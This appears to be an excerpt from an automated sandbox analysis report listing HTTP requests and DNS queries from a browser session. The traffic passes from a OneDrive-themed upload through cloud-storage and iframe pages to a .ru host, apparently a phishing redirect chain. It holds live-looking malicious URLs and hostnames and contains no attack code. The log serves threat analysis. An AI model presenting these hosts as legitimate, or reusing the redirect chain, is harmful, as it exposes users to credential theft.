              Source: global trafficHTTP traffic detected: GET /almanac/image/upload/v1736504114/workspace_portal_uploads/Onedrive_Business_ogdmlp.jpg HTTP/1.1Host: res.cloudinary.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.alayna.us/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/AiToolProvider.BNBOsyPR.css HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0
              Source: global trafficHTTP traffic detected: GET /messenger/web/launcher_settings HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /pubsub/5-P_49hX0Pd8PuHTk73GbrwVPlOCx815QTT_9m_yfXsbn5PTmVbOm-FFszLrHPc8bUZUNyC_5cOkzTDMCvNHnTSPW87_deDbxFrAcL?X-Nexus-New-Client=true&X-Nexus-Version=0.14.0&user_role=visitor HTTP/1.1Host: nexus-websocket-a.intercom.ioConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://app.alayna.usSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: R1yieaMPKmGG+QAq/s6TSQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
              Source: global trafficHTTP traffic detected: GET /messenger/web/ping HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /imgs/logos/logo-no-text.png HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0; intercom-id-qer2dd6p=4575b3ae-bd39-4dac-99fe-56fb2863c9b2; intercom-session-qer2dd6p=; intercom-device-id-qer2dd6p=305d8434-4d64-48bb-94d0-e415de07442b
              Source: global trafficHTTP traffic detected: GET /client/assets/AiToolProvider.DS2zOm_j.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0; intercom-id-qer2dd6p=4575b3ae-bd39-4dac-99fe-56fb2863c9b2; intercom-session-qer2dd6p=; intercom-device-id-qer2dd6p=305d8434-4d64-48bb-94d0-e415de07442b
              Source: global trafficHTTP traffic detected: GET /almanac/image/upload/v1736504114/workspace_portal_uploads/Onedrive_Business_ogdmlp.jpg HTTP/1.1Host: res.cloudinary.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/AITools.DdDAMa67.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0; intercom-id-qer2dd6p=4575b3ae-bd39-4dac-99fe-56fb2863c9b2; intercom-session-qer2dd6p=; intercom-device-id-qer2dd6p=305d8434-4d64-48bb-94d0-e415de07442b
              Source: global trafficHTTP traffic detected: GET /track/?verbose=1&ip=1&_=1740518408233 HTTP/1.1Host: api-js.mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/Auth.DFj5DoB1.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0; intercom-id-qer2dd6p=4575b3ae-bd39-4dac-99fe-56fb2863c9b2; intercom-session-qer2dd6p=; intercom-device-id-qer2dd6p=305d8434-4d64-48bb-94d0-e415de07442b
              Source: global trafficHTTP traffic detected: GET /track/?verbose=1&ip=1&_=1740518408854 HTTP/1.1Host: api-js.mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/Auth.DgrpP85N.css HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0; intercom-id-qer2dd6p=4575b3ae-bd39-4dac-99fe-56fb2863c9b2; intercom-session-qer2dd6p=; intercom-device-id-qer2dd6p=305d8434-4d64-48bb-94d0-e415de07442b
              Source: global trafficHTTP traffic detected: GET /client/assets/Authenticated.C3teI_ol.css HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0; intercom-id-qer2dd6p=4575b3ae-bd39-4dac-99fe-56fb2863c9b2; intercom-session-qer2dd6p=; intercom-device-id-qer2dd6p=305d8434-4d64-48bb-94d0-e415de07442b
              Source: global trafficHTTP traffic detected: GET /client/assets/Authenticated.CHp2mxHq.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0; intercom-id-qer2dd6p=4575b3ae-bd39-4dac-99fe-56fb2863c9b2; intercom-session-qer2dd6p=; intercom-device-id-qer2dd6p=305d8434-4d64-48bb-94d0-e415de07442b
              Source: global trafficHTTP traffic detected: GET /client/assets/Avatar.47vy-PoE.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0; intercom-id-qer2dd6p=4575b3ae-bd39-4dac-99fe-56fb2863c9b2; intercom-session-qer2dd6p=; intercom-device-id-qer2dd6p=305d8434-4d64-48bb-94d0-e415de07442b
              Source: global trafficHTTP traffic detected: GET /client/assets/Chat.DX_SIGlb.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.alayna.us/client/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.1.1740518403.0.0.0; intercom-id-qer2dd6p=4575b3ae-bd39-4dac-99fe-56fb2863c9b2; intercom-session-qer2dd6p=; intercom-device-id-qer2dd6p=305d8434-4d64-48bb-94d0-e415de07442b
              Source: global trafficHTTP traffic detected: GET /vendors~app~tooltips.07c9076a.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /vendors~app.bffb7b75.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /app~tooltips.4fe09fcc.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /app.c594e88c.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /palmerww/index.html HTTP/1.1Host: ewr1.vultrobjects.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /api/4505968358326272/envelope/?sentry_version=7&sentry_key=7891508b33b6a44378926ce96ad52c44&sentry_client=sentry.javascript.react%2F8.55.0 HTTP/1.1Host: o4505928814231552.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ZxoLb/ HTTP/1.1Host: es.urboydaudi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ewr1.vultrobjects.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /app~tooltips.4fe09fcc.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /vendors~app.bffb7b75.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /vendors~app~tooltips.07c9076a.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /app.c594e88c.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /launcher-discovery.a1869a1c.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /api/4505968358326272/envelope/?sentry_version=7&sentry_key=7891508b33b6a44378926ce96ad52c44&sentry_client=sentry.javascript.react%2F8.55.0 HTTP/1.1Host: o4505928814231552.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://es.urboydaudi.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://es.urboydaudi.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://es.urboydaudi.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/b0e4a89976ce/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://es.urboydaudi.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /launcher-discovery.a1869a1c.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ewr1.vultrobjects.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ewr1.vultrobjects.com/palmerww/index.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/b0e4a89976ce/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /pani$85uk6xo HTTP/1.1Host: xqg4v.jaamzjd.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://es.urboydaudi.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://es.urboydaudi.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /pani$85uk6xo HTTP/1.1Host: xqg4v.jaamzjd.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /messenger/web/metrics HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /pubsub/5-P_49hX0Pd8PuHTk73GbrwVPlOCx815QTT_9m_yfXsbn5PTmVbOm-FFszLrHPc8bUZUNyC_5cOkzTDMCvNHnTSPW87_deDbxFrAcL?X-Nexus-New-Client=true&X-Nexus-Version=0.14.0&user_role=visitor HTTP/1.1Host: nexus-websocket-a.intercom.ioConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://app.alayna.usSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: /Qemr9KEp/RWMuwwyKQP6Q==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
              Source: global trafficHTTP traffic detected: GET /messenger/web/metrics HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficDNS traffic detected: DNS query: app.alayna.us
              Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
              Source: global trafficDNS traffic detected: DNS query: alayna-app.s3.us-west-2.amazonaws.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: do.featurebase.app
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: widget.intercom.io
              Source: global trafficDNS traffic detected: DNS query: o4505928814231552.ingest.sentry.io
              Source: global trafficDNS traffic detected: DNS query: api-js.mixpanel.com
              Source: global trafficDNS traffic detected: DNS query: js.intercomcdn.com
              Source: global trafficDNS traffic detected: DNS query: api-iam.intercom.io
              Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
              Source: global trafficDNS traffic detected: DNS query: nexus-websocket-a.intercom.io
              Source: global trafficDNS traffic detected: DNS query: ewr1.vultrobjects.com
              Source: global trafficDNS traffic detected: DNS query: es.urboydaudi.com
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: xqg4v.jaamzjd.ru
